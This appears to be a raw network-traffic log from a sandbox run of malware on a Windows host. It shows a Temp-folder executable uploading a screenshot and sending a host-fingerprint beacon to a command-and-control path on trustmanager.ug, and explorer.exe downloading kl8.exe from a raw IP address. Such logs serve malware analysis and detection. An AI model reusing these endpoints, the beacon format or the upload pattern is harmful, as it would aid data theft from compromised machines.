Aug 23, 2021 02:09:12.049196959 CEST	17709	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:12.049263954 CEST	17709	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0
Aug 23, 2021 02:09:12.051156044 CEST	17710	OUT	POST /k8FppT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32 Host: trustmanager.ug Content-Length: 93811 Cache-Control: no-cache
Aug 23, 2021 02:09:12.051255941 CEST	17710	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 34 34 66 65 64 64 35 33 66 32 61 65 65 65 30 39 61 61 34 64 62 63 65 36 62 36 65 39 65 33 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------144fedd53f2aeee09aa4dbce6b6e9e32Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 23, 2021 02:09:12.051454067 CEST	17720	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 23, 2021 02:09:12.051575899 CEST	17722	OUT	Data Raw: fc b8 7d 9b c9 ce ef 61 bb 38 fc 36 fb d7 05 6e 78 a7 24 df de ff 00 c9 7e 67 55 3e 56 d2 b2 fc 3f cc f9 57 53 55 4d 4a 50 a0 01 90 70 3e 82 aa 55 cd 57 fe 42 53 7e 1f c8 55 3c 57 44 be 26 73 2d 84 a5 a5 a5 34 80 6d 14 b4 b8 a0 06 f6 a5 c5 3b 14 Data Ascii: }a86nx$~gU>V?WSUMJPp>UWBS~U<WD&s-4m;b1KN&(1K)h(bSEv1@;EE%bRPbbPRQv((PF)h4} wLT!Z,;SIVb\mbIv(SIV
Aug 23, 2021 02:09:12.078186989 CEST	17725	OUT	Data Raw: 96 28 a1 96 48 a4 48 e6 52 d1 3b 29 02 40 09 04 a9 ee 32 08 e3 b8 ac 29 50 a7 4a 72 94 34 6f 7f c4 b9 d4 9c e2 94 ba 11 d1 56 ae 34 db fb 48 9e 5b 9b 1b 98 63 49 8c 0e f2 42 ca 16 40 32 50 92 38 6c 73 8e b4 eb 6d 23 53 bc fb 3f d9 74 db c9 fe d2 Data Ascii: (HHR;)@2)PJr4oV4H[cIB@2P8lsm#S?tyP3, rq"KVn4BP}UEKtH=o*[67Vs#b`84]VZ$IN^4}BVd{D__k]Mq!{Ic-AuV2yo$d
Aug 23, 2021 02:09:12.078756094 CEST	17736	OUT	Data Raw: 78 46 54 8b c4 90 b1 96 28 66 30 ce b6 d2 ca c1 55 27 31 30 88 e4 f0 0e fd b8 27 a1 c1 ac 3a 08 04 60 d6 b2 57 8b 5d cc d3 b3 b9 e8 5e 1f d1 4e 91 3e 91 36 a7 69 ac 5a 5e ca 35 21 73 67 79 2e c3 22 8b 42 4c b1 ab 46 0a ee ce dc 9d dc af 7e 95 04 Data Ascii: xFT(f0U'10':`W]^N>6iZ^5!sgy."BLF~<!kro2`OJw+ImZz<IxZG=vuP#Up=<tbUg$b;lo%3Q9]1{UXio
Aug 23, 2021 02:09:12.078803062 CEST	17749	OUT	Data Raw: 8a 5b 18 76 34 dd a7 d2 af f9 8a 7a 8a 5f dd 9f e1 a3 d9 f9 87 b4 7d 8c fe 73 4a 33 8a d0 f2 a2 34 1b 68 8f 7a 5e c9 87 b5 46 7d 2d 5c fb 18 ec d4 9f 63 6e c6 8f 65 21 fb 48 95 28 ab 06 d2 41 da 9a 6d e4 1d 8d 2e 46 35 38 f7 21 c5 18 a9 0c 6c 3f Data Ascii: [v4z_}sJ34hz^F}-\cne!H(Am.F58!l?vqb1E%/zP(.%-.(a\mQ`b1JQLBQE.K@)RsKZbRi:qER7)qE:bJ*+.)NQ~(bH9F3Rm>QsZiON
Aug 23, 2021 02:09:12.105397940 CEST	17760	OUT	Data Raw: f9 7a 6c bd 63 02 9a 74 bd 3a 41 f2 b6 da cf 57 3e 94 f5 73 53 c9 25 b3 2d 54 83 de 25 93 a0 40 df 72 5a 89 fc 3b 27 f0 48 0d 0b 2b 03 c1 35 2a dd 4a 3f 8c d1 7a ab a8 72 50 7b c4 a6 fa 1d d2 f4 50 6a 16 d3 6e 53 ac 4d 5a eb 7d 30 ea d5 32 ea 2f Data Ascii: zlct:AW>sS%-T%@rZ;'H+5*J?zrP{PjnSMZ}02/Gzdv5DO>`)^kW\|V;qBr\R$pjLLVGu.(RQbu2DPbv).}cuZxm$iR
Aug 23, 2021 02:09:12.105469942 CEST	17765	OUT	Data Raw: 97 38 a7 8a 60 a7 e2 93 2e 3b 0e 1e f4 fe f4 c1 4f 02 a4 d2 23 85 3b 34 c1 4e a9 2d 0f 14 f1 4c 14 f5 18 35 0c d6 24 83 a5 38 53 05 3c 54 1a 21 e0 d4 8a 73 51 d3 85 43 35 8b 26 14 f1 51 a9 c5 48 a7 35 9b 35 4c 75 3c 74 a6 0a 78 c5 4b 34 43 c5 38 Data Ascii: 8`.;O#;4N-L5$8S<T!sQC5&QH55Lu<txK4C8S8Ty&B]SydJw<L5[o^LmHzg#zIt'k+],2}EmFP%7i(#.\|z@[4.r$8>208
Aug 23, 2021 02:09:12.106132984 CEST	17789	OUT	Data Raw: 52 81 4b 4b 8a e9 39 2c 33 6d 3c 0a 31 4a 05 03 51 00 29 e0 52 01 4f 02 a5 b2 d2 19 8e 69 c0 53 82 e4 d4 81 79 e9 52 d9 a2 88 d0 38 a7 81 4e db 4e 09 50 d9 a2 88 81 78 a7 81 e9 4a 16 9e 16 a1 b3 45 16 20 19 a7 01 4a 16 9e 13 35 2d 9a 28 8d 02 9e Data Ascii: RKK9,3m<1JQ)ROiSyR8NNPxJE J5-(4j#E4jE\UnH0daiTnMH,?k7Q#UNL8-^M>NT?~S!kaLc^[Ft+9Za\,,'&k=Y?}3fn
Aug 23, 2021 02:09:12.108182907 CEST	17802	OUT	Data Raw: 42 83 4b 4d a5 a6 02 d2 52 f7 a4 a0 05 cd 2d 30 d2 83 40 58 75 14 da 51 40 85 a5 cd 36 96 80 16 96 90 51 54 84 2d 29 a4 a4 cd 00 1d e9 69 28 a0 00 d1 45 14 00 51 45 14 00 b4 52 51 40 0e a2 92 94 50 20 a5 a4 a0 d3 01 68 a4 a3 34 08 5a 29 33 45 00 Data Ascii: BKMR-0@XuQ@6QT-)i(EQERQ@P h4Z)3E-RQ@i(E (RQLQH)hRsFi)3Iu9Z)(Bf`.ii(1E%Rf`8ZmVE74Q@4QuRfw(LLvh6yf3KN
Aug 23, 2021 02:09:12.158988953 CEST	17805	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:12.159014940 CEST	17805	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
129	192.168.2.3	49856	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:12.204180002 CEST	17805	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:12.230099916 CEST	17820	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:12.230118036 CEST	17820	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.3	49735	193.142.59.123	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:08:37.893347025 CEST	8628	OUT	GET /forum/docs/kl8.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 193.142.59.123
